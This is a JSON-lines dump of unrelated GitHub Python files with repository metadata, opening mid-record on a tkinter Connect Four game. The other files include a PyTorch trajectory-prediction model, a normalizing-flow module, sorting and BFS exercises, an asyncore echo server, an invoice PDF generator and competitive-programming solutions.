a red token.\nrt_img = Image.open(\"Tokens/Red_Token.png\")\nrt_img = rt_img.resize((50, 50), Image.ANTIALIAS)\nred_token = ImageTk.PhotoImage(rt_img)\n\nph_img = Image.open(\"Tokens/Gray_PlaceHolder.png\")\nph_img = ph_img.resize((30,30), Image.ANTIALIAS)\nplaceholder_token = ImageTk.PhotoImage(ph_img)\n ###########################\n\n\nplay = tkinter.Button(root, text=\"Play\", command=play_pressed) #connects the play button to the play pressed event\nplay.place(relx = 0.5, rely= 0.5, anchor=CENTER)#places the play button in the middle. \n\n\nroot.mainloop() #runs the tkinter loop\n\n\n#noticable bugs to fix later. \n\n#1. The \"tokens\" can be placed one more time than needed, in over words overflowing. \n#2. the colors seem a little weird. \n\n \n\n \n\n\n\n\n\n","repo_name":"Evgeniy-Agaev/C2C_PostAssessment_Connect4Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18413924914","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Thu Aug 6 18:53:28 2020\n\n@author: Demain Wang\n\"\"\"\nimport torch\nimport torch.nn as nn\nfrom utils_TP2Net import hstfutset\n\n''' \nTP2Net for trajectory prediction \n'''\nclass TP2Net(nn.Module):\n def __init__(self):\n super(TP2Net,self).__init__()\n \n # basic setting\n self.HST_LEN,self.FUT_LEN=hstfutset()\n self.input_size=7\n self.hidden_size=128\n self.input_embedding_size=64\n self.batch_size=128\n self.ego_enc_size=64\n self.ego_sur_size=64\n self.num_lat_class=3\n self.num_lon_class=3\n self.atten_output_size_tpa=64\n \n # base function\n self.ip_emb_ego=torch.nn.Linear(self.input_size,self.input_embedding_size)\n self.ip_emb_sur_1=torch.nn.Linear(self.input_size,self.input_embedding_size)\n self.in_lstm_ego=torch.nn.LSTM(self.input_embedding_size,self.hidden_size,1,batch_first=True)\n self.in_lstm_sur=torch.nn.LSTM(self.input_embedding_size,self.hidden_size,1,batch_first=True)\n self.ot_emb_ego=torch.nn.Linear(self.hidden_size,self.ego_enc_size)\n self.ot_emb_sur=torch.nn.Linear(self.hidden_size,self.ego_sur_size)\n \n self.dec_lstm = torch.nn.LSTM(self.ego_enc_size + self.ego_sur_size*4 + self.atten_output_size_tpa, self.hidden_size,1)\n self.op_lat = torch.nn.Linear(self.ego_enc_size + self.ego_sur_size*4 + self.atten_output_size_tpa, self.num_lat_class)\n self.op_lon = torch.nn.Linear(self.ego_enc_size + self.ego_sur_size*4 + self.atten_output_size_tpa, self.num_lon_class)\n self.op=torch.nn.Linear(self.hidden_size,5)\n \n # TPA\n self.TPA=TemporalPatternAttention(self.input_size,self.batch_size,self.atten_output_size_tpa)\n \n # ego_zero\n self.egoempty_enc=torch.zeros((self.batch_size,self.ego_sur_size)).cuda() \n \n # VOI weighting\n self.conv3x3=torch.nn.Conv2d(self.ego_sur_size, self.ego_sur_size*4, (3,3))\n self.conv1x1=torch.nn.Conv2d(self.ego_sur_size, self.ego_sur_size, (1,1))\n \n # activation module\n self.leaky_relu=torch.nn.LeakyReLU(0.1)\n self.relu=torch.nn.ReLU()\n self.softmax=torch.nn.Softmax(dim=1)\n\n def forward(self,ego,pre,fol,lftpre,lftalo,lftfol,rgtpre,rgtalo,rgtfol):\n \n #encoding of ego vehicle\n hst_ego=self.ip_emb_ego(ego) \n _,(hid_ego,_)=self.in_lstm_ego(self.leaky_relu(hst_ego))\n ego_enc=self.leaky_relu(self.ot_emb_ego(torch.squeeze(hid_ego)))\n \n #encoding of sur vehicle\n pre_enc,hst_pre=self.sudveh_enc(pre)\n fol_enc,hst_fol=self.sudveh_enc(fol)\n lftpre_enc,hst_lftpre=self.sudveh_enc(lftpre)\n lftalo_enc,hst_lftalo=self.sudveh_enc(lftalo)\n lftfol_enc,hst_lftfol=self.sudveh_enc(lftfol)\n rgtpre_enc,hst_rgtpre=self.sudveh_enc(rgtpre)\n rgtalo_enc,hst_rgtalo=self.sudveh_enc(rgtalo)\n rgtfol_enc,hst_rgtfol=self.sudveh_enc(rgtfol) \n\n # VOI weighting\n pre=torch.stack((lftpre_enc,pre_enc,rgtpre_enc),2).contiguous()\n alo=torch.stack((lftalo_enc,self.egoempty_enc,rgtalo_enc),2).contiguous()\n fol=torch.stack((lftfol_enc,fol_enc,rgtfol_enc),2).contiguous()\n sur_cs=torch.stack((pre,alo,fol),2)\n \n # VOI conv \n sur_cs=self.leaky_relu(self.conv1x1(sur_cs)) \n sur_conv3x3=self.leaky_relu(self.conv3x3(sur_cs))\n sur_conv3x3=torch.squeeze(sur_conv3x3)\n \n # Temporal pattern attention\n tpa_attention=self.TPA(ego)\n \n # concatenate\n enc=torch.cat((ego_enc,tpa_attention,sur_conv3x3),1)\n\n # maneuver recognition\n lat_pred = self.softmax(self.op_lat(enc))\n lon_pred = self.softmax(self.op_lon(enc))\n \n # predict the trajectory\n fut_pd=self.decode(enc)\n \n return fut_pd,lat_pred,lon_pred\n \n def sudveh_enc(self,veh):\n \n #encoding of sur vehicle\n sur_lin=self.ip_emb_sur_1(veh)\n _,(hid_veh,_)=self.in_lstm_sur(self.leaky_relu(sur_lin))\n veh_enc=self.leaky_relu(self.ot_emb_sur(torch.squeeze(hid_veh)))\n \n return veh_enc,sur_lin\n\n def decode(self,enc):\n \n #decode the tensor\n enc=enc.repeat(self.FUT_LEN,1,1)\n h_dec,_=self.dec_lstm(enc)\n h_dec=h_dec.permute(1,0,2)\n fut_pred=self.op(h_dec)\n fut_pred=fut_pred.permute(1,0,2)\n fut_pred=outputActivation(fut_pred)\n \n return fut_pred\n\n# It can also be used for NLL loss\ndef outputActivation(x):\n muX = x[:,:,0:1]\n muY = x[:,:,1:2]\n sigX = x[:,:,2:3]\n sigY = x[:,:,3:4]\n rho = x[:,:,4:5]\n sigX = torch.exp(sigX)\n sigY = torch.exp(sigY)\n rho = torch.tanh(rho)\n out = torch.cat([muX, muY, sigX, sigY, rho],dim=2)\n \n return out\n\n# Temporal Pattern attintion for trajectory prediction \n# Adaptation changes have been made \n\nclass TemporalPatternAttention(nn.Module):\n def __init__(self,input_size_atten,batch_size,output_size):\n super(TemporalPatternAttention,self).__init__()\n ''' \n input: \n input_size_atten: the size of attention input\n batch_size: the size of mini_batch\n output_size: size of ht'\n '''\n #basic setting\n self.input_size_attention=input_size_atten\n self.atten_hid_size=output_size\n self.window_length,self.FUT_LEN=hstfutset()\n self.output_channel=32\n self.drop_rate=0.3\n self.batch_size=batch_size\n \n #basic function\n self.in_lstm_attention=torch.nn.LSTM(self.input_size_attention,self.atten_hid_size,1,batch_first=True)\n self.compute_convolution=torch.nn.Conv2d(1,self.output_channel,kernel_size=(1,self.atten_hid_size))\n \n # weighting to be register\n self.attention_matrix = nn.Parameter(torch.ones(self.batch_size, self.output_channel, self.atten_hid_size, requires_grad=True))\n self.register_parameter('atten_mat',self.attention_matrix)\n self.final_state_matrix = nn.Parameter(torch.ones(self.batch_size, self.atten_hid_size, self.atten_hid_size, requires_grad=True))\n self.register_parameter('final_state_mat',self.final_state_matrix)\n self.context_vector_matrix = nn.Parameter(torch.ones(self.batch_size, self.atten_hid_size, self.output_channel, requires_grad=True))\n self.register_parameter('context_vector_mat',self.context_vector_matrix)\n \n # weighting init\n torch.nn.init.xavier_uniform_(self.attention_matrix)\n torch.nn.init.xavier_uniform_(self.final_state_matrix)\n torch.nn.init.xavier_uniform_(self.context_vector_matrix)\n \n #activation module\n self.relu=torch.nn.ReLU()\n self.dropout=torch.nn.Dropout(self.drop_rate)\n self.leaky_relu=torch.nn.LeakyReLU(0.1)\n \n def forward(self,ego):\n # get the attention input and encode\n atten_input=ego\n # atten_input=self.leaky_relu(ego)\n lstm_hidden,(h_all,_)=self.in_lstm_attention(atten_input)\n \n # reshape\n hn = h_all[-1].view(1, h_all.size(1), h_all.size(2))\n \n # conv of tensor of op\n output_realigned = lstm_hidden.contiguous()\n hn = hn.permute(1, 0, 2).contiguous()\n input_to_convolution_layer = output_realigned.view(-1, 1, self.window_length, self.atten_hid_size)\n convolution_output = self.leaky_relu(self.compute_convolution(input_to_convolution_layer))\n convolution_output = self.dropout(convolution_output)\n \n #gen attenion map\n convolution_output = convolution_output.squeeze(3) \n final_hn = torch.zeros(self.attention_matrix.size(0), 1, self.atten_hid_size)\n input_sur = torch.zeros(self.attention_matrix.size(0), atten_input.size(1), atten_input.size(2))\n final_convolution_output = torch.zeros(self.attention_matrix.size(0), self.output_channel, self.window_length)\n diff = 0\n if (hn.size(0) < self.attention_matrix.size(0)):\n final_hn[:hn.size(0), :, :] = hn\n final_convolution_output[:convolution_output.size(0), :, :] = convolution_output\n input_sur[:atten_input.size(0), :, :] = atten_input\n diff = self.attention_matrix.size(0) - hn.size(0)\n else:\n final_hn = hn\n final_convolution_output = convolution_output\n input_sur = atten_input\n \n # key queries and get the value\n convolution_output_for_scoring = final_convolution_output.permute(0, 2, 1).contiguous().cuda()\n final_hn_realigned = final_hn.permute(0, 2, 1).contiguous().cuda()\n mat1 = torch.bmm(convolution_output_for_scoring, self.attention_matrix).cuda()\n \n #get the scoring function\n scoring_function = torch.bmm(mat1, final_hn_realigned).cuda()\n alpha = torch.sigmoid(scoring_function)\n \n #broadcast\n context_vector = alpha * convolution_output_for_scoring\n context_vector = torch.sum(context_vector, dim=1).cuda()\n \n # get ht'\n context_vector = context_vector.view(-1, self.output_channel, 1)\n h_intermediate = torch.bmm(self.final_state_matrix, final_hn_realigned) + torch.bmm(self.context_vector_matrix, context_vector)\n \n #reshape \n h_intermediate=h_intermediate.squeeze(2)#128,32\n \n return h_intermediate\n\n\n\n\n\n\n\n\n\n","repo_name":"DemianWang/TP2Net","sub_path":"Code/model_TP2Net.py","file_name":"model_TP2Net.py","file_ext":"py","file_size_in_byte":9558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"70140840097","text":"class Solution(object):\n def firstUniqChar(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n dic = {}\n for i in range(len(s)):\n if s[i] in dic:\n dic[s[i]] = -1\n else:\n dic[s[i]] = i\n\n li = [x for i, x in dic.items() if x != -1]\n li.sort()\n return li[0] if len(li) > 0 else -1\n","repo_name":"less1226/learningpython","sub_path":"leetcode/387.firstUniqChar.py","file_name":"387.firstUniqChar.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"34029436873","text":"# Sorting algorithms\n# Overlaps with C++ basic-6\n\nimport func\n\ndef main():\n givenList = [23,45,12,53,125,62]\n func.QuickSort(givenList)\n print(\"Result of quicksort is\",givenList)\n\n givenList = [23,45,12,53,125,62]\n func.MergeSort(givenList)\n print(\"Result of mergesort is\",givenList)\n\n givenList = [23,45,12,53,125,62]\n func.HeapSort(givenList)\n print(\"Result of heapsort is\", givenList)\n\n givenList = [23,45,12,53,125,62]\n func.RadixSort(givenList)\n print(\"Result of radixsort is\", givenList)\n\n givenList = [23,45,12,53,125,62]\n func.SelectionSort(givenList,len(givenList))\n print(\"Result of selction srot is\",givenList)\n\n givenList = [23,45,12,53,125,62]\n func.BubbleSort(givenList,len(givenList))\n print(\"Result of bubblesort is\",givenList)\n\n givenList = [23,45,12,53,125,62]\n func.InsertionSort(givenList,len(givenList))\n print(\"Result of insertion sort is\",givenList)\n\n givenList = [23,45,12,53,125,62]\n func.CountingSort(givenList,len(givenList))\n print(\"Result of counting sort is\",givenList)\n\nif __name__ == \"__main__\":\n main()","repo_name":"david4270/concepts-python","sub_path":"Algo-2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15409773355","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport asyncore\n# import socket\n\nfrom asynchat_echo_handler import EchoHandler\n\n\nclass EchoServer(asyncore.dispatcher):\n \"\"\"Receives connections and establishes handlers for each client.\n \"\"\"\n\n def __init__(self, address):\n asyncore.dispatcher.__init__(self)\n\n self.create_socket(asyncore.socket.AF_INET,\n asyncore.socket.SOCK_STREAM)\n self.bind(address)\n self.address = self.socket.getsockname()\n self.listen(1)\n\n return\n\n def handle_accept(self):\n # Called when a client connects to our socket\n client, address = self.accept()\n EchoHandler(sock=client)\n\n # We only want to deal with one client at a time,\n # so close as soon as we set up the handler.\n # Normally you would not do this and the server\n # would run forever or until it received instructions\n # to stop\n\n self.handle_close()\n return\n\n def handle_close(self):\n self.close()\n","repo_name":"nixawk/hello-python2","sub_path":"asynchat/asynchat_echo_server.py","file_name":"asynchat_echo_server.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"34"} +{"seq_id":"16179317793","text":"# Write a Python program that has 2 arrays in the main function:\n# One containing several elements which are numbers.\n# The other empty.\n# Write another function which accepts a number as a parameter and returns the number doubled.\n# The main function should call this function for each element of the 1st array and populate the 2nd array with the doubled values when the 2nd array is full it should be printed out\n\ndef main():\n oneArr = [1,2,15,7,3,6,23]\n twoArr = timesTwo(oneArr)\n print(oneArr)\n print(twoArr)\n\n\ndef timesTwo(firstArr):\n secondArr = []\n for i in firstArr:\n secondArr.append(i * 2)\n return secondArr\n\nif __name__ == \"__main__\":\n main()","repo_name":"kiehozero/atu-applied-dbs","sub_path":"labs/ex8-q1.py","file_name":"ex8-q1.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9065012829","text":"import pandas as pd\nfrom fpdf import FPDF\n\nimport glob\nfrom pathlib import Path\n\nfilepaths = glob.glob('invoices/*.xlsx')\n\nfor filepath in filepaths:\n filename = Path(filepath).stem\n invoice_nr, invoice_date = filename.split('-')\n pdf = FPDF(orientation='P', unit='mm', format='A4')\n pdf.add_page()\n pdf.set_font(family='Times', size=16, style='b')\n pdf.cell(w=50, h=10, txt=f'Invoice nr. {invoice_nr}', ln=1)\n pdf.cell(w=50, h=10, txt=f'Date {invoice_date}', ln=1)\n\n df = pd.read_excel(filepath, sheet_name='Sheet 1')\n df = df.rename(columns={'product_id': 'Product ID', 'product_name': 'Product Name',\n 'amount_purchased': 'Amount', 'price_per_unit': 'Price per Unit',\n 'total_price': 'Total Price'})\n \n # Add footer to df\n empty_cells = df.shape[1] - 1\n total_row = ['' for x in range(empty_cells)]\n total_price = df['Total Price'].sum()\n total_row.append(total_price)\n df.loc[len(df.index)] = total_row\n\n # Table header\n pdf.set_font(family='Times', style='b', size=14)\n columns = df.columns\n pdf.cell(w=30, h=10, txt=columns[0], border=1)\n pdf.cell(w=70, h=10, txt=columns[1], border=1)\n pdf.cell(w=30, h=10, txt=columns[2], border=1)\n pdf.cell(w=30, h=10, txt=columns[3], border=1)\n pdf.cell(w=30, h=10, txt=columns[4], ln=1, border=1)\n\n # Table content\n pdf.set_font(family='Times', size=12)\n for index, row in df.iterrows():\n \n pdf.cell(w=30, h=10, border=1, txt=str(row['Product ID']))\n pdf.cell(w=70, h=10, border=1, txt=str(row['Product Name']))\n pdf.cell(w=30, h=10, border=1, txt=str(row['Amount']))\n pdf.cell(w=30, h=10, border=1, txt=str(row['Price per Unit']))\n pdf.cell(w=30, h=10, border=1, txt=str(row['Total Price']), ln=1)\n\n pdf.set_font(family='Times', style='b', size=14)\n pdf.cell(w=30, h=8, txt=f'The total price is {total_price}', ln=1)\n pdf.cell(w=25, h=8, txt='PythonHow')\n pdf.image(w=10, name='pythonhow.png')\n pdf.output(f'{invoice_nr}-{invoice_date}.pdf')\n\n\n# print(filepaths)\n\n","repo_name":"be1ia1/udemy-tpmc","sub_path":"app4-invoice-generation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23530340014","text":"import os\nimport pandas as pd\nimport numpy as np\nimport csv\nimport math\nfrom collections import Counter\nBASE_PATH = '/data/amazon'\nTRAIN_CSV = 'train_v2.csv'\n\nLABEL_ALL = [\n 'blow_down',\n 'conventional_mine',\n 'slash_burn',\n 'blooming',\n 'artisinal_mine',\n 'selective_logging',\n 'bare_ground',\n 'cloudy',\n 'haze',\n 'habitation',\n 'cultivation',\n 'partly_cloudy',\n 'water',\n 'road',\n 'agriculture',\n 'clear',\n 'primary',\n]\n\nLABEL_GROUND_COVER = [\n 'blow_down',\n 'conventional_mine',\n 'slash_burn',\n 'blooming',\n 'artisinal_mine',\n 'selective_logging',\n 'bare_ground',\n 'habitation',\n 'cultivation',\n 'water',\n 'road',\n 'agriculture',\n 'primary',\n]\n\nLABEL_SKY_COVER = [\n 'cloudy',\n 'haze',\n 'partly_cloudy',\n 'clear',\n]\n\n\ndef main():\n train_df = pd.read_csv(os.path.join(BASE_PATH, TRAIN_CSV))\n train_df.tags = train_df.tags.map(lambda x: set(x.split()))\n\n count = Counter()\n train_df.tags.apply(lambda x: count.update(x))\n\n for k in count:\n train_df[k] = [1 if k in tag else 0 for tag in train_df.tags]\n\n train_df = train_df[(train_df[LABEL_SKY_COVER].T != 0).any()]\n\n with open('tags_count.csv', 'w') as f:\n w = csv.writer(f)\n w.writerow(['tag', 'count'])\n for k, v in count.items():\n w.writerow([k, v])\n f.close()\n\n tags_only = train_df[list(count.keys())]\n corr = tags_only.corr()\n corr.to_csv(\"corr.csv\")\n\n attempt = 0\n num_folds = 12\n target_counts = {k: (v / num_folds) for k, v in count.items()}\n target_thresh = {k: max(1., v * .20) for k, v in target_counts.items()}\n print(target_counts, target_thresh)\n furthest_fold = 0\n fold_counts = []\n while attempt < 1000000:\n train_df['fold'] = np.random.randint(0, num_folds, size=len(train_df.index))\n valid = True\n ss = train_df.groupby('fold').sum()\n for f in range(num_folds):\n sr = ss.ix[f]\n fold_counts.append(sr)\n for k, v in sr.items():\n target = target_counts[k]\n thresh = target_thresh[k]\n diff = math.floor(abs(v - target))\n thresh = 3.0 if k == 'conventional_mine' else math.ceil(thresh)\n if diff > thresh:\n valid = False\n if f > furthest_fold:\n furthest_fold = f\n print(f, abs(v - target), math.ceil(thresh), k)\n break\n if not valid:\n break\n if valid:\n break\n else:\n fold_counts = []\n attempt += 1\n print(attempt, furthest_fold)\n for i, x in enumerate(fold_counts):\n print(i)\n for k, v in x.items():\n print(k, v)\n print()\n labels_df = train_df[['image_name', 'fold'] + list(count.keys())]\n labels_df.to_csv(\"labels.csv\", index=False)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"rwightman/pytorch-planet-amazon","sub_path":"scripts/process_labels.py","file_name":"process_labels.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"34"} +{"seq_id":"4588132045","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom spirl.modules.subnetworks import Predictor\nfrom spirl.modules.variational_inference import MultivariateGaussian\n\n\nclass NormalizingFlowModel(nn.Module):\n \"\"\"\n Joins multiple flow models into composite flow.\n Implementation extended from: https://github.com/tonyduan/normalizing-flows/blob/master/nf/models.py\n \"\"\"\n\n def __init__(self, flow_dim, flows):\n super().__init__()\n self._flow_dim = flow_dim\n self.flows = nn.ModuleList(flows)\n\n def forward(self, x, cond_inputs=None):\n m, _ = x.shape\n log_det = torch.zeros(m, device=x.device)\n for flow in self.flows:\n x, ld = flow.forward(x, cond_inputs)\n log_det += ld\n z, prior_logprob = x, self._get_prior(m, x.device).log_prob(x)\n return z, prior_logprob, log_det\n\n def inverse(self, z, cond_inputs=None):\n m, _ = z.shape\n log_det = torch.zeros(m, device=z.device)\n for flow in self.flows[::-1]:\n z, ld = flow.inverse(z, cond_inputs)\n log_det += ld\n x = z\n return x, log_det\n\n def sample(self, num_samples=None, device=None, cond_inputs=None):\n if num_samples is None:\n num_samples = cond_inputs[0].shape[0]\n if device is None:\n device = cond_inputs[0].device\n z = self._get_prior(batch_size=num_samples, device=device).sample()\n x, _ = self.inverse(z, cond_inputs)\n return x\n\n def _get_prior(self, batch_size, device):\n return MultivariateGaussian(torch.zeros((batch_size, self._flow_dim), requires_grad=False, device=device),\n torch.zeros((batch_size, self._flow_dim), requires_grad=False, device=device))\n\n\nclass RealNVP(nn.Module):\n \"\"\"\n Non-volume preserving flow.\n [Dinh et. al. 2017]\n Implementation extended from: https://github.com/tonyduan/normalizing-flows/blob/master/nf/flows.py\n \"\"\"\n def __init__(self, dim, cond_dim=None, hidden_dim=32):\n \"\"\"Constructs RealNVP flow. Note that input_dim == output_dim == dim.\n cond_dim allows to add conditioning to the flow model.\n \"\"\"\n super().__init__()\n assert dim % 2 == 0 # need even input/output dim to use split-in-half scheme\n self.dim = dim\n self.cond_dim = cond_dim\n input_dim = self.dim // 2 if cond_dim is None else self.dim // 2 + cond_dim\n self.t1 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n self.s1 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n self.t2 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n self.s2 = FCNN(in_dim=input_dim, out_dim=dim // 2, hidden_dim=hidden_dim)\n\n def forward(self, x, cond_inputs=None):\n \"\"\"Forward pass of the RealNVP module. Cond_inputs is a list of conditioning tensors.\"\"\"\n assert len(x.shape) == 2 and x.shape[-1] == self.dim\n if cond_inputs is not None:\n assert np.prod([ci.shape[-1] for ci in cond_inputs]) == self.cond_dim\n lower, upper = x[:, :self.dim // 2], x[:, self.dim // 2:]\n t1_transformed = self.t1(lower, cond_inputs)\n s1_transformed = self.s1(lower, cond_inputs)\n upper = t1_transformed + upper * torch.exp(s1_transformed)\n t2_transformed = self.t2(upper, cond_inputs)\n s2_transformed = self.s2(upper, cond_inputs)\n lower = t2_transformed + lower * torch.exp(s2_transformed)\n z = torch.cat([lower, upper], dim=1)\n log_det = torch.sum(s1_transformed, dim=1) + \\\n torch.sum(s2_transformed, dim=1)\n return z, log_det\n\n def inverse(self, z, cond_inputs=None):\n assert len(z.shape) == 2 and z.shape[-1] == self.dim\n if cond_inputs is not None:\n assert np.prod([ci.shape[-1] for ci in cond_inputs]) == self.cond_dim\n lower, upper = z[:, :self.dim // 2], z[:, self.dim // 2:]\n t2_transformed = self.t2(upper, cond_inputs)\n s2_transformed = self.s2(upper, cond_inputs)\n lower = (lower - t2_transformed) * torch.exp(-s2_transformed)\n t1_transformed = self.t1(lower, cond_inputs)\n s1_transformed = self.s1(lower, cond_inputs)\n upper = (upper - t1_transformed) * torch.exp(-s1_transformed)\n x = torch.cat([lower, upper], dim=1)\n log_det = torch.sum(-s1_transformed, dim=1) + \\\n torch.sum(-s2_transformed, dim=1)\n return x, log_det\n\n\nclass FCNN(nn.Module):\n \"\"\"\n Simple fully connected neural network.\n \"\"\"\n def __init__(self, in_dim, out_dim, hidden_dim):\n super().__init__()\n self.network = nn.Sequential(\n nn.Linear(in_dim, hidden_dim),\n nn.Tanh(),\n nn.Linear(hidden_dim, hidden_dim),\n nn.Tanh(),\n nn.Linear(hidden_dim, out_dim),\n )\n\n def forward(self, x, additional_inputs):\n input = torch.cat([x] + additional_inputs, dim=-1) if additional_inputs is not None else x\n return self.network(input)\n\n\nclass FlowDistributionWrapper:\n \"\"\"Lightweight wrapper around flow model that makes it behave like distribution.\"\"\"\n def __init__(self, flow, cond_inputs=None):\n self._flow = flow\n self._cond_inputs = cond_inputs\n self._detached = False # indicates whether flow output should be detached\n\n def log_prob(self, x):\n _, prior_logprob, log_det = self._flow(x, self._cond_inputs)\n if self._detached:\n prior_logprob, log_det = prior_logprob.detach(), log_det.detach()\n return prior_logprob + log_det\n\n def nll(self, x):\n return -1 * self.log_prob(x)\n\n def sample(self):\n return self._flow.sample(cond_inputs=self._cond_inputs)\n\n def rsample(self):\n return self.sample()\n\n @staticmethod\n def cat(*argv, dim):\n # TODO: implement concatentation for flow distribution\n return argv[0]\n\n def detach(self):\n self._detached = True\n return self\n\n def to_numpy(self):\n return np.zeros((1,)) # there is no numpy representation for an implicit function\n\n def entropy(self):\n return np.array(0.) # dummy value - entropy of flow not defined\n\n\nclass ConditionedFlowModel(nn.Module):\n \"\"\"Wraps flow model and conditioning network.\"\"\"\n def __init__(self, hp, input_dim, output_dim, n_flow_layers):\n super().__init__()\n self._hp = hp\n self._cond_net = Predictor(hp, input_size=input_dim, output_size=self._hp.nz_mid_prior,\n num_layers=self._hp.num_prior_net_layers, mid_size=self._hp.nz_mid_prior)\n self._flows = [RealNVP(output_dim, cond_dim=self._hp.nz_mid_prior) for _ in range(n_flow_layers)]\n self._flow_mdl = NormalizingFlowModel(output_dim, self._flows)\n\n def forward(self, obs):\n cond = self._cond_net(obs)\n return FlowDistributionWrapper(self._flow_mdl, cond_inputs=[cond])\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n\n # generate data\n data = np.concatenate((np.random.normal(loc=(1.0, 0.0), scale=(0.1, 0.1), size=(1000, 2)),\n np.random.normal(loc=(-1.0, 0.0), scale=(0.1, 0.1), size=(1000, 2)),\n np.random.normal(loc=(0.0, 1.0), scale=(0.1, 0.1), size=(1000, 2)),\n np.random.normal(loc=(0.0, -1.0), scale=(0.1, 0.1), size=(1000, 2))))\n np.random.shuffle(data)\n\n # set up flow model\n flows = [RealNVP(2) for _ in range(3)]\n model = NormalizingFlowModel(2, flows)\n\n pydata = torch.tensor(data, dtype=torch.float32)\n optimizer = torch.optim.Adam(model.parameters(), lr=0.005)\n\n # train flow model\n for i in range(600):\n optimizer.zero_grad()\n flow_dist = FlowDistributionWrapper(model)\n loss = flow_dist.nll(pydata).mean()\n loss.backward()\n optimizer.step()\n if i % 100 == 0:\n print(f\"Iter: {i}\\t\" +\n f\"NLL: {loss.mean().data:.2f}\\t\")\n\n # visualize samples\n samples = flow_dist._flow.sample(num_samples=data.shape[0], device=\"cpu\").data.numpy()\n fig = plt.figure()\n plt.scatter(data[:, 0], data[:, 1], c='black', alpha=0.5)\n plt.scatter(samples[:, 0], samples[:, 1], c='green', alpha=0.5)\n plt.axis(\"equal\")\n plt.savefig(\"flow_data_fit.png\")\n plt.close(fig)\n\n\n ### Train second model to fit first model by minimizing empirical KL\n flows2 = [RealNVP(2) for _ in range(3)]\n sample_train_model = NormalizingFlowModel(2, flows2)\n optimizer = torch.optim.Adam(sample_train_model.parameters(), lr=0.005)\n\n for i in range(10000):\n optimizer.zero_grad()\n # flow_dist = FlowDistributionWrapper(model)\n flow_dist_sample_train = FlowDistributionWrapper(sample_train_model)\n loss_samples = []\n for _ in range(1):\n # data_sample = flow_dist._flow.sample(num_samples=data.shape[0], device=\"cpu\").detach()\n flow_sample = flow_dist_sample_train._flow.sample(num_samples=data.shape[0], device=\"cpu\")\n # loss = flow_dist_sample_train.nll(data_sample).mean()\n loss = (flow_dist_sample_train.log_prob(flow_sample) - flow_dist.log_prob(flow_sample))\n # loss = (flow_dist.log_prob(data_sample) - flow_dist_sample_train.log_prob(data_sample))\n loss_samples.append(loss)\n loss = torch.cat(loss_samples).mean()\n loss.backward()\n optimizer.step()\n if i % 100 == 0:\n print(f\"Iter: {i}\\t\" +\n f\"NLL: {loss.mean().data:.2f}\\t\")\n\n # visualize samples\n samples = flow_dist._flow.sample(num_samples=data.shape[0], device=\"cpu\").data.numpy()\n samples_sample_train = flow_dist_sample_train._flow.sample(num_samples=data.shape[0], device=\"cpu\").data.numpy()\n fig = plt.figure()\n plt.scatter(samples[:, 0], samples[:, 1], c='black', alpha=0.5)\n plt.scatter(samples_sample_train[:, 0], samples_sample_train[:, 1], c='green', alpha=0.5)\n plt.axis(\"equal\")\n plt.savefig(\"flow_sample_fit.png\")\n plt.close(fig)\n","repo_name":"clvrai/spirl","sub_path":"spirl/modules/flow_models.py","file_name":"flow_models.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"34"} +{"seq_id":"4421986441","text":"graph = {\n 'P' : ['Q','R','S'],\n 'Q' : ['P', 'R'],\n 'R' : ['P','Q','T'],\n 'S' : ['P'],\n 'T' : ['R'],\n \n}\n\nvisited = [] # List for visited nodes.\nqueue = [] #Initialize a queue\n\ndef bfs(visited, graph, node): #function for BFS\n visited.append(node)\n queue.append(node)\n\n while queue: # Creating loop to visit each node\n m = queue.pop(0) \n print (m, end = \" \") \n\n for neighbour in graph[m]:\n print(\"\\nneighbor:\",neighbour)\n if neighbour not in visited:\n visited.append(neighbour)\n queue.append(neighbour)\n print(\"queue:\",queue)\n\n\nprint(\"Following is the Breadth-First Search\")\nbfs(visited, graph, 'P') # function calling","repo_name":"SanaMateen/AILAB","sub_path":"uninformedsearch/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"6209241191","text":"# D - Union of Interval\n# https://atcoder.jp/contests/abc256/tasks/abc256_d\nN = int(input())\n\narea = [0] * (2 * 10**5 + 1)\nfor _ in range(N):\n l, r = map(int, input().split())\n area[l] += 1\n area[r] -= 1\n\nl = 2 * 10**5 + 1\ncnt = 0\nis_enabled = False\nfor i in range(1, 2 * 10**5 + 1):\n cnt += area[i]\n if cnt > 0:\n l = min(l, i)\n is_enabled = True\n elif cnt == 0 and is_enabled:\n print(l, i)\n l = 2 * 10**5 + 1\n is_enabled = 